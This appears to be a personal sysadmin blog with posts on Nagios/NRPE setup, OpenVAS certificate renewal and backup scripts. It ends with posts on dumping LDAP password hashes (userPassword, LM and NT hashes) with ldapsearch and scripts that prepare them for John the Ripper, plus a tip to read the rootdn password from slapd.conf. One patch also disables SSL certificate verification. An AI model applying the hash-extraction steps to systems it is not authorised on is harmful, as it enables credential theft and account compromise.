i have a netapp.
the mibs are all new all the time since it is an enclosure.
i am using nagios.
my old nagios scripts do not work with my netapp.
here are some variables and here are some snmp oid changes:
FAN 1.3.6.1.4.1.789.1.21.1.2.1.18
PS 1.3.6.1.4.1.789.1.21.1.2.1.15
TEMP 1.3.6.1.4.1.789.1.21.1.2.1.27
thanks:
http://www.mibdepot.com/cgi-bin/getmib3.cgi?win=mib_a&r=netapp&f=netapp_2_2_2.mib&v=v2&t=tree
Monday, December 12, 2016
netapp mibs changes or curse you snmp
Thursday, December 8, 2016
openvas is having a bad day on debian 8.2
openvas is having a bad day on debian 8.2
i am seeing:
Operation: Start Task
Status code: 503
Status message: Service temporarily down
and to make things worse:
lib serv:WARNING:2016-12-07 10h00.00 UTC:4546: Failed to shake hands with peer:
The TLS connection was non-properly terminated.
lib serv:WARNING:2016-12-07 10h00.00 UTC:4546: Failed to shutdown server socket
event task:MESSAGE:2016-12-07 10h00.00 UTC:4546: Task could not be started by admin
great.
that means my certs are out of date. guess i need to update them.
# systemctl stop openvas-scanner
# systemctl stop openvas-manager
# openvas-mkcert -f
# openvas-mkcert-client -i -n
# openvasmd --get-scanners
08b69003-5fc2-4037-a479-93b440211c73 OpenVAS Default <- unique to each install
# ls -la /usr/local/var/lib/openvas/private/CA/
yes. that's where the keys are located.
# openvasmd --modify-scanner "08b69003-5fc2-4037-a479-93b440211c73" \
--scanner-ca-pub /usr/local/var/lib/openvas/CA/cacert.pem \
--scanner-key-pub /usr/local/var/lib/openvas/CA/clientcert.pem \
--scanner-key-priv /usr/local/var/lib/openvas/private/CA/clientkey.pem
# openvas-nvt-sync
# openvasmd --rebuild
# systemctl start openvas-manager
# systemctl start gsa
done
Thursday, December 1, 2016
backup /etc on ubuntu 12.04
because i need /etc .
run to output installed packages... this helps with system restore, if
needed.
etc_backup.sh
#!/bin/bash
# Script to backup the /etc heirarchy
#
# Written 4/2002 by Wayne Pollock, Tampa Florida USA
#
# $Id: backup-etc,v 1.6 2004/08/25 01:42:26 wpollock Exp $
#
# $Log: backup-etc,v $
#
# Revision 1.6 2004/08/25 01:42:26 wpollock
# Changed backup name to include the hostname and 4 digit years.
#
# Revision 1.5 2004/01/07 18:07:33 wpollock
# Fixed dots routine to count files first, then calculate files per dot.
#
# Revision 1.4 2003/04/03 08:10:12 wpollock
# Changed how the version number is obtained, so the file
# can be checked out normally.
#
# Revision 1.3 2003/04/03 08:01:25 wpollock
# Added ultra-fancy dots function for verbose mode.
#
# Revision 1.2 2003/04/01 15:03:33 wpollock
# Eliminated the use of find, and discovered that tar was working
# as intended all along! (Each directory that find found was
# recursively backed-up, so for example /etc, then /etc/mail,
# caused /etc/mail/sendmail.mc to be backuped three times.)
#
# Revision 1.1 2003/03/23 18:57:29 wpollock
# Modified by Wayne Pollock:
#
# Discovered not all files were being backed up, so
# added "-print0 --force-local" to find and "--null -T -"
# to tar (eliminating xargs), to fix the problem when filenames
# contain metacharacters such as whitespace.
# Although this now seems to work, the current version of tar
# seems to have a bug causing it to backup every file two or
# three times when using these options! This is still better
# than not backing up some files at all.)
#
# Changed the logger level from "warning" to "error".
#
# Added '-v, --verbose' options to display dots every 60 files,
# just to give feedback to a user.
#
# Added '-V, --version' and '-h, --help' options.
#
# Removed the lock file mechanism and backup file renaming
# (from foo to foo.1), in favor of just including a time-stamp
# of the form "yymmdd-hhmm" to the filename.
#
PATH=/bin:/usr/bin
REPOSITORY=/opt/etc_backups/
TIMESTAMP=$(date '+%Y%m%d')
HOSTNAME=$(hostname -s)
FILE="$REPOSITORY/$HOSTNAME-$TIMESTAMP.tgz"
ERRMSGS=/tmp/backup-etc.$$
PROG=${0##*/}
VERSION=$(echo $Revision: 1.6 $ |awk '{print$2}')
VERBOSE=off
usage()
{ echo "This script creates a full backup of /etc via tar in $REPOSITORY."
echo "Usage: $PROG [OPTIONS]"
echo ' Options:'
echo ' -v, --verbose displays some feedback (dots) during backup'
echo ' -h, --help displays this message'
echo ' -V, --version display program version and author info'
echo
}
dots()
{ MAX_DOTS=50
NUM_FILES=`find /etc|wc -l`
let 'FILES_PER_DOT = NUM_FILES / MAX_DOTS'
bold=`tput smso`
norm=`tput rmso`
tput sc
tput civis
echo -n "$bold(00%)$norm"
while read; do
let "cnt = (cnt + 1) % FILES_PER_DOT"
if [ "$cnt" -eq 0 ]
then
let '++num_dots'
let 'percent = (100 * num_dots) / MAX_DOTS'
[ "$percent" -gt "100" ] && percent=100
tput rc
printf "$bold(%02d%%)$norm" "$percent"
tput smir
echo -n "."
tput rmir
fi
done
tput cnorm
echo
}
# Command line argument processing:
while [ $# -gt 0 ]
do
case "$1" in
-v|--verbose) VERBOSE=on; ;;
-h|--help) usage; exit 0; ;;
-V|--version) echo -n "$PROG version $VERSION "
echo 'Written by Wayne Pollock <pollock@acm.org>'
exit 0; ;;
*) usage; exit 1; ;;
esac
shift
done
trap "rm -f $ERRMSGS" EXIT
cd /etc
# create backup, saving any error messages:
if [ "$VERBOSE" != "on" ]
then
tar -cz --force-local -f $FILE . 2> $ERRMSGS
else
tar -czv --force-local -f $FILE . 2> $ERRMSGS | dots
fi
# Log any error messages produced:
if [ -s "$ERRMSGS" ]
then logger -p user.error -t $PROG "$(cat $ERRMSGS)"
else logger -t $PROG "Completed full backup of /etc"
fi
exit 0
i have it running in system cron. prior to it executing, i have dpkgrun to output installed packages... this helps with system restore, if
needed.
50 22 * * * root /usr/bin/dpkg --get-selections > /etc/package-list.txt
00 23 * * * root /usr/local/scripts/etc_backup.sh
bash scripts to backup svn server
there is nothing nearer and dearer to my heart than my svn server. if i lost it i would be unhappy for a very long time.
i have a bunch of scripts here:
/nfserver/bin
why? because if i lost my nfs mounts, my scripts would not work and i would not have to deal with my fs filling up.
yes, i could check for the mount being active, but why bother? i like keeping all my eggs in one basket.
i have a bunch of scripts here:
/nfserver/bin
why? because if i lost my nfs mounts, my scripts would not work and i would not have to deal with my fs filling up.
yes, i could check for the mount being active, but why bother? i like keeping all my eggs in one basket.
svn_backup.sh
#!/bin/bash
# set values
repos=( repo1 repo2 repo3 )
rpath=/var/svn/repositories
opath=/nfsmount/svn
tpath=/tmp/svn
suffix=$(date +%Y-%m-%d)
#check if we need to make output path
if [ -d $opath ]
then
# directory exists, we are good to continue
filer="just some action to prevent syntax error"
else
#we need to make the directory
echo Creating $opath
mkdir -p $opath
fi
# remove contents of tmp
rm -rf $tpath
mkdir -p $tpath
for (( i = 0 ; i < ${#repos[@]} ; i++ ))
do
svnadmin hotcopy $rpath/${repos[$i]} ${tpath}/${repos[$i]}_$suffix.hotcopy
#now compress them
tar -czf ${opath}/${repos[$i]}_$suffix.hotcopy.tar.gz -C ${tpath}/${repos[$i]}_$suffix.hotcopy .
if [ -s error ]
then
printf "WARNING: An error occured while attempting to backup %s \n\tError:\n\t" ${repos[$i]}
cat error
rm -f er
else
printf "%s was backed up successfully \n\n" ${repos[$i]} $SVNDUMP
fi
done
let's backup the individual hooks and conf directories. and apache conf, too. hotcopy will backup db, and that's about it.
we need confs. hooks. and stuff. logs meh.
the svn server has the following layout:
> hookscripts
mailer.conf
no-archives.py
post-commit
pre-commit
pre-revprop-change
readme.txt
svnperms.conf
svnperms.py
> logs
commit-email.log
repo-pre-commit
svn_logfile
> repositories
> repo
> conf
> dav
> db
> format
> hooks
> locks
svn_apacheconf_backup.sh
#!/bin/bash
# set values
apacheconf=( /etc/apache2 )
svnconf=( /var/svn/hookscripts )
repos=( repo1 repo2 repo3 )
confdirs=( conf hooks )
rpath=/var/svn/repositories
opath=/nfsmount/svn
suffix=$(date +%Y-%m-%d)
#check if we need to make path
if [ -d $opath ]
then
# directory exists, we are good to continue
filler="just some action to prevent syntax error"
else
#we need to make the directory
echo Creating $opath
mkdir -p $opath
fi
#now do the apache backup
APACHECONFDUMP=${opath}/apacheconf_$suffix.tar.gz
tar -zcvf $APACHECONFDUMP $apacheconf 2>&1
if [ -s error ]
then
printf "WARNING: An error occured while attempting to backup %s \n\tError:\n\t" $apacheconf
cat error
rm -f er
else
printf "%s was backed up successfully \n\n" $APACHECONFDUMP
fi
#now do the svn conf backup
SVNCONFDUMP=${opath}/svnconf_$suffix.tar.gz
tar -zcvf $SVNCONFDUMP $svnconf 2>&1
if [ -s error ]
then
printf "WARNING: An error occured while attempting to backup %s \n\tEr$
cat error
rm -f er
else
printf "%s was backed up successfully \n\n" $SVNCONFDUMP
fi
#now to do the config backups
for (( i = 0; i < ${#repos[@]} ; i++ ))
do
for (( j = 0 ; j < ${#confdirs[@]} ; j++ ))
do
CONFDUMP=${opath}/${repos[i]}_${confdirs[j]}_$suffix.tar.gz
CONFDIR=${rpath}/${repos[i]}/${confdirs[j]}
tar -zcvf $CONFDUMP $CONFDIR 2>&1
if [ -s error ]
then
printf "WARNING: An error occured while attempting to backup %s \n\tError:\n\t" $CONFDIR
cat error
rm -f er
else
printf "%s was backed up successfully \n\n" $CONFDUMP
fi
done
done
let's purge our old backups. i keep a week of them.
svn_purgebackups.sh
#!/bin/bash
#this script will run through all nested directories of a parent just killing off all matching files.
######
### Set these values
######
## default days to retain (override with .RETAIN_RULE in specific directory
DEFRETAIN=7
#want to append the activity to a log? good idea, add its location here
LOGFILE=/nfsmount/svn/removed.log
# enter the distinguishing extension, or portion of the filename here (eg. log, txt, etc.)
EXTENSION=gz
#the absolute path of folder to begin purging
#this is the top most file to begin the attack, all sub directories contain lowercase letters and periods are game.
DIRECTORY=/nfsmount/svn
#####
## End user configuartion
#####
#this note will remind you that you have a log in case your getting emails from a cron job or something
echo see $LOGFILE for details
#jump to working directory
cd $DIRECTORY
#if your sub-dirs have some crazy characters you may adjust this regex
DIRS=`ls | grep ^[a-z.]*$`
TODAY=`date`
printf "\n\n********************************************\n\tSVN Purge Log for:\n\t" | tee -a $LOGFILE
echo $TODAY | tee -a $LOGFILE
printf "********************************************\n" $TODAY | tee -a $LOGFILE
for DIR in $DIRS
do
pushd $DIR >/dev/null
HERE=`pwd`
printf "\n\n%s\n" $HERE | tee -a $LOGFILE
if [ -f .RETAIN_RULE ]
then
printf "\tdefault Retain period being overridden\n" | tee -a $LOGFILE
read RETAIN < .RETAIN_RULE
else
RETAIN=$DEFRETAIN
fi
printf "\tpurging files older than %s days\n" ${RETAIN} | tee -a $LOGFILE
OLDFILES=`find -mtime +${RETAIN} -regex .*${EXTENSION}.*`
set -- $OLDFILES
if [ -z $1 ]
then
printf "\tNo files matching purge criteria\n" | tee -a $LOGFILE
else
printf "\tDump Files being deleted from $HERE\n" | tee -a $LOGFILE
printf "\t\t%s\n" $OLDFILES | tee -a $LOGFILE
fi
rm -f $OLDFILES
if [ $? -ne 0 ]
then
echo "Error while deleting last set" | tee -a $LOGFILE
exit 2
else
printf "\tSuccess\n" | tee -a $LOGFILE
fi
popd >/dev/null
done
in priv user crontab, i have these entries:
15 0 * * * /nfsmount/bin/svn_backup.sh | mail -s "svn hotcopy report" me@there.com 2>&1
25 0 * * * /nfsmount/bin/svn_apacheconf_backup.sh | mail -s "svn apacheconf report" me@there.com 2>&1
45 1 * * * /nfsmount/bin/svn_purgebackups.sh | mail -s "purge archive report" me@there.com 2>&1
Wednesday, November 30, 2016
compile and install nagios nrpe 2.15 on ubuntu 12.04 lts
compile and install nagios nrpe 2.15 on ubuntu 12.04 lts
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.3 LTS"
download and install gz'd code in /usr/local/src
add nagios user
# useradd -c "nagios system user" -d /usr/local/nagios -m nagios
# groupadd nagios
# chown nagios:nagios /usr/local/nagios
compile and install nrpe
# gunzip nrpe-2.15.tar.gz
# tar xvf nrpe-2.15.tar
# cd nrpe-2.15
# ./configure --with-ssl=/usr/bin/openssl --with-ssl-lib=/usr/lib/x86_64-linux-gnu
# make && make install
/usr/bin/install -c -m 775 -o nagios -g nagios -d /usr/local/nagios/bin
/usr/bin/install -c -m 775 -o nagios -g nagios nrpe /usr/local/nagios/bin
# make install-daemon-config
/usr/bin/install -c -m 775 -o nagios -g nagios -d /usr/local/nagios/etc
/usr/bin/install -c -m 644 -o nagios -g nagios sample-config/nrpe.cfg /usr/local/nagios/etc
# gunzip nagios-plugins-1.4.16.tar.gz
# tar xvf nagios-plugins-1.4.16.tar
# cd nagios-plugins-1.4.16/
# ./configure --without-mysql
# make && make install
...
* note
i'm hardcoding the libs for nrpe because
configure does this...
checking for type of socket size... size_t
checking for SSL headers... SSL headers found in /usr
checking for SSL libraries... configure: error: Cannot find ssl libraries
meh
# apt-get install libssl-dev
# ldconfing
# apt-file search libssl | grep libssl-dev
...
set up the nrpe daemon
# echo 'nrpe 5666/tcp # NRPE' >> /etc/services
# cp /usr/local/src/nrpe-2.15/init-script.debian /etc/init.d/nrpe
# chmod +x /etc/init.d/nrpe
# sysv-rc-conf
set to runlevels 2 3 4 5
q to exit :^)
edit nrpe.cfg to site specs
# vi /usr/local/nagios/etc/nrpe.cfg
run nrpe daemon
# /etc/init.d/nrpe start
running?
# netstat -an |grep 5666
tcp 0 0 0.0.0.0:5666 0.0.0.0:* LISTEN
tcp6 0 0 :::5666 :::* LISTEN
check if npre is accessible. the rev show show up.
# /usr/local/nagios/libexec/check_nrpe -H localhost
NRPE v2.15
make it easy on yourself with a script as opposed to copy/paste.
useradd -c "nagios system user" -d /usr/local/nagios -m nagios ;
chown nagios:nagios /usr/local/nagios ;
mkdir -p /usr/local/src ;
cd /usr/local/src ;
scp you@somewhere:/dir/nrpe-2.15.tar.gz . ;
scp you@somewhere:/dir/nagios-plugins-1.4.16.tar.gz . ;
scp you@somewhere:/dir/templates/* . ;
gunzip nrpe-2.15.tar.gz ;
tar xvf nrpe-2.15.tar ;
gunzip nagios-plugins-1.4.16.tar.gz ;
tar xvf nagios-plugins-1.4.16.tar ;
cd nrpe-2.15 ;
./configure --with-ssl=/usr/bin/openssl --with-ssl-lib=/usr/lib/x86_64-linux-gnu ;
make && make install ;
make install-daemon-config ;
cd ../nagios-plugins-1.4.16 ;
./configure --without-mysql ;
make && make install ;
cp /usr/local/src/nrpe.cfg /usr/local/nagios/etc/ ;
echo 'nrpe 5666/tcp # NRPE' >> /etc/services ;
cp /usr/local/src/nrpe-2.15/init-script.debian /etc/init.d/nrpe ;
chmod +x /etc/init.d/nrpe
common prereqs:
libssl-dev
apt-file
sysv-rc-conf
note:
if you see the make error in npre section (make will not tell you, you have to watch the process):
./nrpe.c:269: undefined reference to `get_dh512'
a hint is when you rn /etc/init.d/nrpe and do not see the output:
Starting nagios remote plugin daemon: nrpe.
edit dh.h with C-code output if openssl is installed.
# openssl dhcparam -C 512 > /usr/local/src/nrpe-2.15/include/dh.h
and removing all between:
-----BEGIN DH PARAMETERS-----
-----END DH PARAMETERS-----
if running openssl comes up as not found,
apt-get install openssl
for ubuntu 10 and lower:
--with-ssl=/usr/bin/openssl --with-ssl-lib=/usr/lib
if you do not want to roll your own:
apt-get install nagios-nrpe-server
apt-get install nagios-plugins
apt-get install nagios-plugins-basic
apt-get install nagios-plugins-standard
all the conf stuff resides in:
/etc/nagios
...
a basic-o-rama template (npre.cfg):
#############################################################################
# NRPE Config File
#
# Last Modified: TODAY!
#############################################################################
# LOG FACILITY
log_facility=daemon
# PID FILE
pid_file=/var/run/nrpe.pid
# PORT NUMBER
server_port=5666
# SERVER ADDRESS
#server_address=127.0.0.1
# NRPE USER
nrpe_user=nagios
# NRPE GROUP
nrpe_group=nagios
# ALLOWED HOST ADDRESSES
# NOTE: This option is ignored if NRPE is running under either inetd or xinetd
# losthost and monitoring servers
allowed_hosts=127.0.0.1,128.6.6.6,10.5.5.5
# COMMAND ARGUMENT PROCESSING
dont_blame_nrpe=0
# BASH COMMAND SUBTITUTION
allow_bash_command_substitution=0
# DEBUGGING OPTION
# Values: 0=debugging off, 1=debugging on
debug=0
# COMMAND TIMEOUT
command_timeout=60
# COMMAND DEFINITIONS
# The following examples use hardcoded command arguments...
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_root]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /
command[check_zombie_procs]=/usr/local/nagios/libexec/check_procs -w 5 -c 10 -s Z
command[check_total_procs]=/usr/local/nagios/libexec/check_procs -w 600 -c 900
Tuesday, November 29, 2016
check_vmware_api.pl install is perl hell
Prerequisites:
- Ubuntu 14.04 Server (perl v5.18.2)
- VMware-vSphere-Perl-SDK-5.5.0-2043780
- check_vmware_api.pl 0.7.1
Basic installation:
apt-get install perl-doc libssl-dev libxml-libxml-perl libarchive-zip-perl libcrypt-ssleay-perl libclass-methodmaker-perl libuuid-perl libdata-dump-perl libsoap-lite-perl libio-compress-perl
tar -xf VMware-vSphere-Perl-SDK-5.5.0-2043780.x86_64.tar.gz -C /tmp
cd /tmp/vmware-vsphere-cli-distrib
./vmware-install.pl
...
cpan[3]> i /libwww-perl/
Distribution GAAS/libwww-perl-5.837.tar.gz
Distribution GAAS/libwww-perl-6.01.tar.gz
Distribution GAAS/libwww-perl-6.05.tar.gz
Author LWWWP ("The libwww-perl mailing list" <libwww@perl.org>)
4 items found
cpan[4]> install GAAS/libwww-perl-5.837.tar.gz
Running make for G/GA/GAAS/libwww-perl-5.837.tar.gz
Checksum for /root/.cpan/sources/authors/id/G/GA/GAAS/libwww-perl-5.837.tar.gz ok
...
http://search.cpan.org/dist/Nagios-Plugin/lib/Nagios/Plugin.pm
Nagios::Monitoring::Plugin
Nagios::Plugin <- no longer
...
Work around for "Server version unavailable":
patch -b /usr/share/perl/5.14/VMware/VICommon.pm new(agent => "VI Perl");
+ $user_agent->ssl_opts( SSL_verify_mode => 0 );
my $cookie_jar = HTTP::Cookies->new(ignore_discard => 1);
$user_agent->cookie_jar($cookie_jar);
$user_agent->protocols_allowed(['http', 'https']);
@@ -502,7 +503,7 @@
sub query_server_version {
BEGIN {
#To remove SSL Warning, switching from IO::Socket::SSL to Net::SSL
- $ENV{PERL_NET_HTTPS_SSL_SOCKET_CLASS} = "Net::SSL";
+ #$ENV{PERL_NET_HTTPS_SSL_SOCKET_CLASS} = "Net::SSL";
#To remove host verification
$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;
}
@@ -526,6 +527,7 @@
}
}
my $user_agent = LWP::UserAgent->new(agent => "VI Perl");
+ $user_agent->ssl_opts( SSL_verify_mode => 0 );
my $cookie_jar = HTTP::Cookies->new(ignore_discard => 1);
$user_agent->cookie_jar($cookie_jar);
$user_agent->protocols_allowed(['http', 'https']);
@@ -2108,6 +2110,7 @@
sub new {
my ($class, $url) = @_;
my $user_agent = LWP::UserAgent->new(agent => "VI Perl");
+ $user_agent->ssl_opts( SSL_verify_mode => 0 );
my $cookie_jar = HTTP::Cookies->new(ignore_discard => 1);
$user_agent->cookie_jar( $cookie_jar );
$user_agent->protocols_allowed( ['http', 'https'] );
*****************************************************************
...
env -i perl -V
@INC is yucky.
command execution via _compile function in Maketext.pm
Built under linux
Compiled at Feb 4 2014 23:11:19
@INC:
/etc/perl
/usr/local/lib/perl/5.14.2
/usr/local/share/perl/5.14.2
/usr/lib/perl5
/usr/share/perl5
/usr/lib/perl/5.14
/usr/share/perl/5.14
/usr/local/lib/site_perl
All my new stuff is under /usr/local/lib/perl5/
and not /usr/local/lib/site_perl oh come on.
because
Can't locate Monitoring/Plugin/Functions.pm
find / | grep -i Functions.pm <- in 5.18.0
ln -s /usr/local/lib/perl5/site_perl/5.18.0 site_perl
because
Can't locate Params/Validate.pm
find / | grep -i Validate.pm <- in 5.24.0
cd /usr/local/lib/site_perl/Params
ln -s /usr/local/lib/perl5/site_perl/5.24.0/x86_64-linux/Params/Validate .
ln -s /usr/local/lib/perl5/site_perl/5.24.0/x86_64-linux/Params/Validate.pm .
ln -s /usr/local/lib/perl5/site_perl/5.24.0/x86_64-linux/Params/ValidatePP.pm .
ln -s /usr/local/lib/perl5/site_perl/5.24.0/x86_64-linux/Params/ValidateXS.pm .
Wednesday, November 16, 2016
setting a static address in alom
for whatever reason my alom network settings were not picking up dhcp.
that's okay. let's set a static address.
many sun servers, by the way, do not have scadm in the platform directory...
yeah. try it:
/usr/platform/`uname -i`/sbin/scadm
get to a service console via a serial connection, logon and issue:
setsc netsc_dhcp false
setsc netsc_ipaddr <ip address>
setsc netsc_ipnetmask <subnet mask>
setsc netsc_ipgateway <gateway address>
shownetwork <- is useless until you have issued resetsc -y
reset the alom to effect settings:
resetsc -y
Wednesday, November 9, 2016
ilom i heart you
i heart you when the solaris system doesn't autoboot
-> start /SYS
-> start /SP/console
do evil much evil
#.
Wednesday, November 2, 2016
compile and install nagios nrpe 2.15 on solaris 10 sparc
compile and install nagios nrpe 2.15 on solaris 10 sparc
# useradd -c "nagios system user" -d /usr/local/nagios -m nagios
# groupadd nagios
add nagios user to nagios group
# chown nagios:nagios /usr/local/nagios/
# cd /usr/local/src
# wget http://downloads.sourceforge.net/project/nagios/nrpe-2.x/nrpe-2.15/nrpe-2.15.tar.gz
# wget --no-check-certificate https://nagios-plugins.org/download/nagios-plugins-1.4.11.tar.gz
compile and install nrpe
# gunzip nrpe-2.15.tar.gz
# tar xvf nrpe-2.15.tar
# cd nrpe-2.15
# ./configure
# make && make install
# make install-daemon-config
compile and install plugins
# gunzip nagios-plugins-1.4.11.tar.gz
# tar xvf nagios-plugins-1.4.11.tar
# cd nagios-plugins-1.4.11
# ./configure --without-mysql
# make && make install
set up nrpe
# cat nrpe 5666/tcp # NRPE >> /etc/services
# cat nrpe stream tcp nowait nagios \
/usr/sfw/sbin/tcpd /usr/local/nagios/bin/nrpe -c \
/usr/local/nagios/etc/nrpe.cfg -i >> nrpe stream tcp nowait nagios \
/usr/sfw/sbin/tcpd /usr/local/nagios/bin/nrpe -c \
/usr/local/nagios/etc/nrpe.cfg -i
in /etc/inetd.conf add:
nrpe stream tcp nowait nagios /usr/sfw/sbin/tcpd /usr/local/nagios/bin/nrpe -c /usr/local/nagios/etc/nrpe.cfg -i
convert inetd to smf
# inetconv
nrpe -> /var/svc/manifest/network/nrpe-tcp.xml
Importing nrpe-tcp.xml …Done
did it work?
# inetconv -e
svc:/network/nrpe/tcp:default enabled
online?
# svcs svc:/network/nrpe/tcp:default
STATE STIME FMRI
online 15:49:55 svc:/network/nrpe/tcp:default
# netstat -a | grep nrpe
*.nrpe *.* 0 0 49152 0 LISTEN
look at npre.cfg on client
first, add the host and the servers that may access it.
restart the service
# svcadm disable svc:/network/nrpe/tcp:default
# svcadm enable svc:/network/nrpe/tcp:default
check if npre is accessible. the rev show show up.
# /usr/local/nagios/libexec/check_nrpe -H localhost
NRPE v2.15
problems?
# ldd /usr/local/nagios/bin/nrpe <- missing libs?
# less /var/svc/log/network-nrpe:default.log <- logs
and then on the nagios server itself, match the
services with what is defined in npre.cfg
solaris npre plugins look like:
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_hda1]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /
command[check_zombie_procs]=/usr/local/nagios/libexec/check_procs -w 5 -c 10 -s Z
command[check_total_procs]=/usr/local/nagios/libexec/check_procs -w 150 -c 200
note: check_hda1. usually / is defined as /dev/hda1 ; this is not match
the entry in /etc/vfstab . is the system is global root zone for zones
check_procs will need to be edited. change it to something insane like
100 for every zone. it is 150 200, by default.
define service {
host_name sparc01
service_description Root Partition
check_command check_nrpe!check_hda1
use generic-service
}
define service {
host_name sparc01
service_description Current Users
check_command check_nrpe!check_users
use generic-service
}
define service {
host_name sparc01
service_description CPU Load
check_command check_nrpe!check_load
use generic-service
}
define service {
host_name sparc01
service_description Total Processes
check_command check_nrpe!check_total_procs
use generic-service
}
define service {
host_name sparc01
service_description Zombie Processes
check_command check_nrpe!check_zombie_procs
use generic-service
}
high contrast happened
i walked away from my terminal. evil happened.
evil no more!
rundll32.exe %SystemRoot%\system32\shell32.dll,Control_RunDLL %SystemRoot%\system32\desk.cpl desk,@Themes /Action:OpenTheme /file:"C:\Windows\Resources\Ease of Access Themes\classic.theme"
Monday, October 31, 2016
LDAP crypt password extraction
but.
if your passwords are crypt...
ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w badpassword \
-h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" \
-LLL -v "" uid userPassword \
| ldap2pw > ldap.pw
....
#! /usr/bin/perl -w
use strict;
use MIME::Base64;
while( <> && ! eof) { # need eof since we will hit eof on the other <> chomp;
my( $uid, $passw, $cn, $dn );
$cn = $uid = '';
while( <> ) { # get an object
chomp;
last if /^\s*$/; # object have blank lines between then
if( /^cn: (.+)/ ) {
$cn = $1;
} elsif( /^dn: (.+)/ ) {
$dn = $1;
} elsif( /^userP\w+:: (.+)/) {
$passw = substr( decode_base64($1), 7); # assuming {crypt}
} elsif( /^uid: (.+)/) {
$uid = $1;
}
}
print "$uid\:$passw\n" if defined $passw; # only output if object has password
}
...
fun.
LDAP base64 conversion for cracking
ldif and ldap password extraction
when you extract passwords from ldap, they're salted.
you need to convert them to their hashes.
why? well. because of RFC2307
userpasswordvalue = cleartext-password / prefix b64-hashandsalt
prefix = "{" scheme "}"
scheme = %x30-39 / %x41-5A / %x61-7a / %x2D-2F / %x5F
;0-9, A-Z, a-z, "-", ".", "/", or "_"
b64-hashandsalt = <base64 of hashandsalt>
hashandsalt = password-hash salt
password-hash = <digest of cleartext-password salt>
cleartext-password = %x00-FF
salt = %x00-FF
yes. that.
in a previous post i've already mentioned how to extract uids
and passwords into a nice long list for jtr...
you'll need python and the script below which will convert the list
line by line. it'll work for base64 passwords:
MD5, SHA, SHA1, SSHA, SHA256, SSHA256, &c.
first, do some text preparation:
# cut -d ":" -f1 userpassword.out > userpassword.left
# cut -d ":" -f2 userpassword.out > userpassword.base64
..................
#!/usr/bin/python
# base64tohex.py
import binascii
import base64
import sys
f=open(sys.argv[1],"r")
#read in lines - and decode
for x in f.xreadlines():
x=x.rstrip('\n')
try:
print binascii.hexlify(base64.b64decode(x))
except:
print "Error: "+x
..................
# ./base64tohex.py userpassword.base64 > userpassword.right
# paste -d : userpassword.left userpassword.right > userpassword.out
and if you can't figure out what is want in terms of hashes, use hash-identifier for singletons.
use hashid for lists.
# hashid userpassword.right -o userpassword.hashid
after base64 conversion, of course.
Wednesday, October 26, 2016
LDAP attributes for password extraction
for ldap attribute extraction the following are key:
Filter: (objectClass=*)
Attributes: uid, sambaLMPassword, sambaNTPassword, userPassword
i have access to an openldap server. yes!
the search DN is:
dc=my,dc=pants,dc=com
valid user accounts are kept:
ou=users,DN
retired user accounts are kept:
ou=yawn,DN
let's grab passwords...
ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w apassword /
-h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" -LLL /
-v "(objectClass=*)" sambaLMPassword > lmpassword
i know that all valid accounts have this format:
dn: uid=username
some places have a different dn: than the valid logon id.
those can be simply the attribute uid=username
my script below is to slice and dice "dn: uid="
when doing the ldap dump, however, attributes may be juggled. more advanced
text sorting is required for proper formatting... i digress.
#!/bin/bash
dumporig=userpassword
dump=userpassword.sed
cp $lmorig $lm
cp $lmorig $lm
sed -i '/ou=groups/d' $dump <-- remove groups as dumped
sed -i '/sambaDomainName/d' $dump <-- there are no passes for me here
sed -i 's/dn:\ cn=/dn:\ uid=/g' $dump <-- admin has cn: as do others
sed -i '/^$/d' $dump <-- blank lines be gone
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump <-- stripping dn
sed -i 's/ou=users,dc=my,dc=pants,dc=com//g' $dump <-- removing dangling dn
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump <-- stripping dn
sed -i 's/,dc=my,dc=pants,dc=com//g' $dump <-- removing dangling dn
sed -i '/dc=my/d' $dump <-- removing dangling dn
sed -i 's/dn:\ uid=//g' $dump <-- we only want uid
sed -i '/dn:\ /d' $dump <-- for records that only have leadinf dn:
sed -i ':a;N;$!ba;s/\n/blast/g' $dump <-- fun with line breaks
sed -i 's/userPassword::/userPassword:/g' $dump <-- converting attribite. some are :: others :
sed -i 's/userPassword//g' $dump <-- remove the strip altgother. once : remains
sed -i 's/blast:\ /:/g' $dump <-- fun
sed -i 's/blast/\n/g' $dump <-- convert fun to a new line
sed -i '/:/!d' $dump <-- no : ? go away
sed -i '/^:/d' $dump <-- start with : ? go away
sed -i 's/=//g' $dump <-- remove trailing =
sort -u $dump > $dump.out <-- sort the output
rm $dump <-- remove temp file
for LMPassword it is a little simpler.
NTPassword is the same; replace the LMPassword attribute for file
processing.
#!/bin/bash
dumporig=lmpassword
dump=lmpassword.sed
cp $dumporig $dump
sed -i '/ou=groups/d' $dump
sed -i '/sambaDomainName/d' $dump
sed -i '/dn:\ cn=/d' $dump
sed -i '/^$/d' $dump
sed -i '/^uid:\ /d' $dump <-- removing uid if we dumped it
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump
sed -i '/dc=my/d' $dump
sed -i 's/dn:\ uid=//g' $dump
sed -i ':a;N;$!ba;s/\n/blast/g' $dump
sed -i 's/sambaLMPassword//g' $dump
sed -i 's/blast:\ /:/g' $dump
sed -i 's/blast/\n/g' $dump
sed -i '/:/!d' $dump
sort -u $dump > $dump.out
rm $dump
but... what is rootdn's password for to access the openldap server?
it is found here:
/etc/ldap/slapd.conf
scroll down to:
rootdn
another account worth checking is replicator, but
it may be restricted to certain hosts.
rootdn "cn=admin,dc=my,dc=pants,dc=com"
moduleload syncprov.la
overlay syncprov
